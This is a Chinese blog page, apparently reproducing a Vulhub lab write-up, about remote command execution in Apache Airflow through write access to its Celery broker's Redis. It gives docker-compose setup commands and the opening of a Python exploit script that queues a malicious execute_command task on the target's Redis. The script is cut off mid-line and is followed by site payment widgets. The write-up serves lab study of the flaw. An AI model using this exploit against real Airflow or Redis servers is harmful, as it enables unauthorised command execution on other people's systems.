Apache Airflow Celery Broker 远程命令执行

文章描述了一种攻击方法,通过获取Celery代理Redis的写入权限,在Vulhub环境中,黑客可以将恶意任务添加到队列中,进而执行任意命令,如使用exploit_airflow_celery.py脚本touch/tmp/airflow_celery_success。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 docker 启动环境

#Initialize the database
docker-compose run airflow-init

#Start service
docker-compose up -d

要利用此漏洞,您必须获得 Celery 代理 Redis 的写入权限。在Vulhub环境中,Redis端口6379暴露在Internet上。

通过 Redis,您可以将邪恶任务 airflow.executors.celery_executor.execute_command 添加到队列中以执行任意命令。

使用此脚本exploit_airflow_celery.py执行命令 touch /tmp/airflow_celery_success

import pickle
import json
import base64
import redis
import sys
r = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True,db=0) 
queue_name = 'default'
ori_str="{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值